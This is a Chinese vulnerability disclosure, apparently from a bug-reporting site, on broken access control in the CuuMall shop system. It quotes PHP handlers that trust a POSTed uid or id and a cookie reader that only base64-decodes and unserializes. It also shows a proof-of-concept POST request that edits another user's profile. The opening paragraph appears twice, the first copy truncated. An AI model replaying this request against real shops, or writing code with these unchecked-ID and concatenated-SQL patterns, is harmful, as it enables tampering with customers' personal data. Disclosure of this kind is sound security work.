### 简要描述: CuuMall免费开源商城系统 越权集合 ### 详细说明: CuuMall免费开源商城系统 越权可修改对方的 收货地址 个人信息 等等 这里我们举一个例子,修改个人信息 直接看代码: UserInfoAction.class.php:(716-735) ``` public function posteditpro( ) { $uid = $_POST['uid']; $data['shen'] = $_POST['shen']; $data['shi'] = $_POST['shi']; $data['qu'] = $_POST['qu']; $data['sex'] = $_POST['sex']; $data['realname'] = $_POST['realname']; $data['email'] = $_POST['email']; $data['more'] = $_POST['more']; $data['youbian'] = $_POST['youbian']; $data['tel'] = $_POST['tel']; $data['mob'] = $_POST['mob']; $data['qq'] = $_POST['qq']; $data['ww'] = $_POST['ww']; $rej = new Model( "m_per" ); $rej->data( $data )->where( "uid=".$uid )->save( ); $this->assign( "msgTitle", "编辑个人档案成功!" ); $this->success( "编辑个人档案成功!" ); } ``` 我们看看权限判断是靠什么: 还是这个文件(28-35) ``` $co = new Cookie( ); $username = $co->get( c( "GUESTCOOK" )."mall-m-name" ); $password = $co->get( c( "GUESTCOOK" )."mall-m-pass" ); if ( empty( $username ) || empty( $password ) ) { $this->redirect( "home/login" ); exit( ); }...
### 简要描述: CuuMall免费开源商城系统 越权集合 ### 详细说明: CuuMall免费开源商城系统 越权可修改对方的 收货地址 个人信息 等等 这里我们举一个例子,修改个人信息 直接看代码: UserInfoAction.class.php:(716-735) ``` public function posteditpro( ) { $uid = $_POST['uid']; $data['shen'] = $_POST['shen']; $data['shi'] = $_POST['shi']; $data['qu'] = $_POST['qu']; $data['sex'] = $_POST['sex']; $data['realname'] = $_POST['realname']; $data['email'] = $_POST['email']; $data['more'] = $_POST['more']; $data['youbian'] = $_POST['youbian']; $data['tel'] = $_POST['tel']; $data['mob'] = $_POST['mob']; $data['qq'] = $_POST['qq']; $data['ww'] = $_POST['ww']; $rej = new Model( "m_per" ); $rej->data( $data )->where( "uid=".$uid )->save( ); $this->assign( "msgTitle", "编辑个人档案成功!" ); $this->success( "编辑个人档案成功!" ); } ``` 我们看看权限判断是靠什么: 还是这个文件(28-35) ``` $co = new Cookie( ); $username = $co->get( c( "GUESTCOOK" )."mall-m-name" ); $password = $co->get( c( "GUESTCOOK" )."mall-m-pass" ); if ( empty( $username ) || empty( $password ) ) { $this->redirect( "home/login" ); exit( ); } ``` 这里只是用cookie里面的用户名和密码 这里的用户名和密码 都可完全转化为明文 看一下 cookie.class.php: ``` static function get($name) { $value = $_COOKIE[C('COOKIE_PREFIX').$name]; $value = unserialize(base64_decode($value)); return $value; } ``` 这里没有任何秘钥 ,也就是说cookie里面的东西对于我们来说就是明文 那么我们回头再看 uid是post过来的 而且sql注入插入表: $rej->data( $data )->where( "uid=".$uid )->save( ); 这里明显只根据了uid做了判断 我们发送url POST /cuumall_v2.3/v2.3/mall_upload/index.php/home/userinfo/posteditpro postdata: shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=5&realname=&email=test%401.com&more=xddd&youbian=xxx&tel=xxxxx&mob=xxxxxxx&qq=xxxxxxxxxxxxx&ww=xxxxxxxxxxxxxx&imageField.x=93&imageField.y=17&__hash__=f543cb0871b243508a543f0b18b91026 看看cookie里面的username,解出来是test 那么我们uid=5直接更改test2用户的信息资料 [<img src="https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png" alt="18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png) 这里被修改了 我们再看其他地方,还是这个文件: ``` public function postchgrejpro( ) { $id = $_POST['id']; $data['shen'] = $_POST['shen']; $data['shi'] = $_POST['shi']; $data['qu'] = $_POST['qu']; $data['more'] = $_POST['more']; $data['youbian'] = $_POST['youbian']; $data['rejname'] = $_POST['rejname']; $data['mob'] = $_POST['mob']; $data['tel'] = $_POST['tel']; $data['email'] = $_POST['email']; $data['qq'] = $_POST['qq']; $data['ww'] = $_POST['ww']; $rej = new Model( "m_rejpro" ); $rej->data( $data )->where( "id=".$id )->save( ); $this->assign( "waitSecond", 3 ); $this->assign( "jumpUrl", "__APP__/home/userinfo/rejpru" ); $this->assign( "msgTitle", "收货地址编辑成功" ); $this->success( "收货地址编辑成功!" ); } ``` 原理和刚才那个一样 这里不多赘述 其实应该还有好多地方,凡是用uid 做验证的 都具有越权操作 ### 漏洞证明:
